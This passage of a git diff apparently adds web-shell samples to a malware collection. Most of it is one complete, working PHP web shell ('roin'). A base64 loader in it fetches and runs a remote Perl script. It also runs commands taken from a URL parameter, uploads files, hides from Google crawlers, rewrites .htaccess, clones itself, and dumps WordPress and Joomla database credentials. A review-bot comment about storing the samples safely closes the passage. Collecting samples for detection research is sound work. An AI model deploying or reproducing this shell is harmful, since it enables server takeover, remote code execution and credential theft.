+1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ0dFV + 
+CAnLiR1cmwuJyA + ++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdybSAtcmYgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDt3Z2V0ICcuJH + +VybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtjdXJsICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgc + +m9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjZCAvdG1wO2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJv + +YioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9 + +leGVjKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtHRVQgJy4kdXJsLi + +cgPnJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtybSAtcmYgaW5kZXgucGhwLionKTsNCglAc2hlbGxfZXhlYygnY2QgL + +3RtcDtybSAtcmYgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0KicpOw0KCUBzaGVsbF9leGVjKCdybSAtcmYgcm9i + +Ki50eHQqJyk7DQp9ZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KCUBzeXN0ZW0oJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2I + +qLnR4dCcpOw0KCUBzeXN0ZW0oJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2x3cC1kb3dubG9hZCAtYSAnLi + +R1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O + +3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglA + 
+c3lzdGVtKCdHRVQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDt3Z2V0ICc + +uJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3 + +QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtyb + +SAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2x5bnggLXNvdXJjZSAnLiR1cmwuJyA + ++IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZX + +JsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO0dFVCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdyb + +SAtcmYgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdmFyL3RtcDtybSAtcmYgaW5kZXgucGhwLionKTsNCglAc3lzdGVtKCdjZCAvdG1wO3JtIC1yZiByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7cm0gLXJm + +IHJvYioudHh0KicpOw0KfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCglAcGFzc3RocnUoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3J + +tIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY3VybCAnLiR1cmwuJyAtbyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdsd3AtZG + +93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O + +3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVybC4nIDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAt + +ZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ0dFVCAnLiR1cmwuJyA + 
++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO3dnZXQgJy4kdXJsLi + +cgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY2QgL3RtcDtjdXJsICcuJHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4d + +DtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAt + +ZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXN + +zdGhydSgnY2QgL3RtcDtmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO0dFVCAnLiR1cmwuJz + +twZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ3JtIC1yZiBpbmRleC5waHAuKicpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHBhc3N0a + +HJ1KCdybSAtcmYgcm9iKi50eHQqJyk7DQp9DQo/Pg=="; + $code2 = base64_decode($code); + $myfile = fopen("pl.php", "w+"); + fwrite($myfile, $code2); + fclose($myfile); + } + private function check($tipe) { + if ($tipe == "cmd") { + $result = 0; + if (function_exists('passthru')) { + $result = "passthru"; + } elseif (function_exists('system')) { + $result = "system"; + } elseif (function_exists('exec')) { + $result = "exec"; + } elseif (function_exists('shell_exec')) { + $result = "shell_exec"; + } + } else { + $result = "linux"; + if (PHP_OS == "WINNT") { + $result = "windows"; + } elseif (PHP_OS == "Linux") { + $result = "linux"; + } elseif (PHP_OS == "FreeBSD") { + $result = "freebsd"; + } + } + return $result; + } + private function getForm() { + $this->form(); + if (isset($_GET['start'])) { + echo "
Upload File

New name:
"; + $this->processForm(); + $this->cmd(); + } else { + $this->cmd(); + } + } + private function form() { + if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'google') !== false) { + header('HTTP/1.0 404 Not Found'); + echo "

Error 404 Not Found

"; + echo "The page that you have requested could not be found."; + exit(); + } + $safe = @ini_get('safe_mode'); + $secure = (!$safe) ? "SAFE_MODE : OFF roin" : "SAFE_MODE : ON roin"; + echo ""; + echo "Touched By roin
"; + echo "" . $secure . "
"; + $cur_user = "(" . $this->user . ")"; + echo "User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "
"; + echo "Uname : " . php_uname() . "
"; + } + private function processForm() { + if (isset($_POST['submit'])) { + $uploaddir = $this->pwd(); + if (!$name = $_POST['newname']) { + $name = $_FILES['userfile']['name']; + } + move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); + echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" : "Success Upload to " . $uploaddir . $name; + } + } + private function pwd() { + $cwd = getcwd(); + if ($u = strrpos($cwd, '/')) { + return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd; + } elseif ($u = strrpos($cwd, '/')) { + if ($u != strlen($cwd) - 1) { + return $cwd . '/'; + } else { + return $cwd; + } + } + } + private function cmd($cmd = false) { + if ($cmd) { + echo '
' . $this->exe($cmd) . '
'; + } else { + if (isset($_GET['q'])) { + echo '
' . $this->exe($_GET['q']) . '
'; + } else { + echo ($this->os == "windows") ? '
' . $this->exe('dir') . '
' : '
' . $this->exe('ls -la') . '
';
+ }
+ }
+ }
+ private function exe($cmd) {
+ $res = '';
+ if ($this->type == "exec") {
+ @exec($cmd, $res);
+ $res = join("n", $res);
+ } elseif ($this->type == "shell_exec") {
+ $res = @shell_exec($cmd);
+ } elseif ($this->type == "system") {
+ @ob_start();
+ @system($cmd);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ } elseif ($this->type == "passthru") {
+ @ob_start();
+ @passthru($cmd);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return $res;
+ }
+ private function setPatch($user, $data, $lock, $path, $force) {
+ $create = 1;
+ if (!$force) {
+ if (in_array($user, $this->access)) {
+ $create = 0;
+ }
+ }
+ if ($create) {
+ if ($lock) {
+ $i = 'deny from all' . PHP_EOL;
+ } else {
+ $i = '' . PHP_EOL;
+ $i.= 'deny from all' . PHP_EOL;
+ $i.= '' . PHP_EOL;
+ }
+ if (is_array($data)) {
+ foreach ($data as $k) {
+ $i.= '' . PHP_EOL;
+ $i.= 'Order Allow,Deny' . PHP_EOL;
+ $i.= 'Allow from all' . PHP_EOL;
+ $i.= '' . PHP_EOL;
+ }
+ } else {
+ if (!empty($data)) {
+ $i.= '' . PHP_EOL;
+ $i.= 'Order Allow,Deny' . PHP_EOL;
+ $i.= 'Allow from all' . PHP_EOL;
+ $i.= '' . PHP_EOL;
+ } else {
+ $i.= '' . PHP_EOL;
+ $i.= 'Order Allow,Deny' . PHP_EOL;
+ $i.= 'Allow from all' . PHP_EOL;
+ $i.= '' . PHP_EOL;
+ $i.= '' . PHP_EOL;
+ $i.= 'Order Allow,Deny' . PHP_EOL;
+ $i.= 'Allow from all' . PHP_EOL;
+ $i.= '' . 
PHP_EOL;
+ }
+ }
+ if (is_array($path)) {
+ foreach ($path as $k) {
+ $file = fopen($k, "w");
+ fwrite($file, $i);
+ fclose($file);
+ }
+ } else {
+ if (!empty($path)) {
+ $file = fopen($path, "w");
+ fwrite($file, $i);
+ fclose($file);
+ } else {
+ $file = fopen(".htaccess", "w");
+ fwrite($file, $i);
+ fclose($file);
+ }
+ }
+ }
+ }
+ private function setDB($file) {
+ $read = file_get_contents($file);
+ if ($read) {
+ echo $read;
+ } else {
+ echo "Unable to open file";
+ }
+ exit;
+ }
+ private function setClone($path) {
+ if (file_exists($path)) {
+ @unlink($path);
+ }
+ $source = $_SERVER['SCRIPT_FILENAME'];
+ copy($source, $path);
+ }
+ private function joomlaDb() {
+ $p1 = "../../../../../../../";
+ $p2 = "../../../../../../";
+ $p3 = "../../../../../";
+ $p4 = "../../../../";
+ $p5 = "../../../";
+ $p6 = "../../";
+ $p7 = "../";
+ $j = file_get_contents($p1 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents($p2 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents($p3 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents($p4 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents($p5 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents($p6 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents($p7 . "configuration.php");
+ if (!$j) {
+ $j = file_get_contents("configuration.php");
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ echo $j;
+ exit;
+ }
+ private function wpDb() {
+ $p1 = "../../../../../../../";
+ $p2 = "../../../../../../";
+ $p3 = "../../../../../";
+ $p4 = "../../../../";
+ $p5 = "../../../";
+ $p6 = "../../";
+ $p7 = "../";
+ $w = file_get_contents($p1 . "wp-config.php");
+ if (!$w) {
+ $w = file_get_contents($p2 . "wp-config.php");
+ if (!$w) {
+ $w = file_get_contents($p3 . "wp-config.php");
+ if (!$w) {
+ $w = file_get_contents($p4 . "wp-config.php");
+ if (!$w) {
+ $w = file_get_contents($p5 . "wp-config.php");
+ if (!$w) {
+ $w = file_get_contents($p6 . 
"wp-config.php");
+ if (!$w) {
+ $w = file_get_contents($p7 . "wp-config.php");
+ if (!$w) {
+ $w = file_get_contents("wp-config.php");
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ echo $w;
+ exit;
+ }
+ private function delete($file) {
+ chmod("./", 0755);
+ chmod("../", 0755);
+ chmod("../../", 0755);
+ @unlink($this->pwd() . $file);
+ $this->exe('rm -rf ' . $file);
+ $this->exe('del ' . $file);
+ }
+}
+new roin();
+?>
\ No newline at end of file
diff --git a/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php b/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php
new file mode 100644
index 0000000..d68a6bd
--- /dev/null
+++ b/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php
@@ -0,0 +1,209 @@
+
\ No newline at end of file
diff --git a/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php b/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php
new file mode 100644
index 0000000..2d88d63
--- /dev/null
+++ b/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php
@@ -0,0 +1,65 @@
+
\ No newline at end of file
diff --git a/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php b/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php
new file mode 100644
index 0000000..387fead
--- /dev/null
+++ b/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php
@@ -0,0 +1,7 @@
+
diff --git a/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php b/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php
new file mode 100644
index 0000000..b5aabf9
--- /dev/null
+++ b/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php
@@ -0,0 +1,3 @@
+
\ No newline at end of file
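Review bot: The four `Obfuscated/WebShell_*.php` files are added with mode 100644 and a live `.php` extension, so a checkout that ends up under a PHP-enabled document root would make each sample requestable and runnable as-is. I would store them under a neutral suffix, for example `WebShell_<hash>.php.txt`, or inside a password-protected archive, so that a misplaced clone cannot serve them. A short README stating where each sample came from and what the 40-hex suffix in the file name is a hash of (it looks like a SHA-1 of the file, but nothing here confirms that) would let analysts verify a sample before working on it. The bodies of these four hunks are not visible in this view, so the note concerns how the samples are stored, not their content.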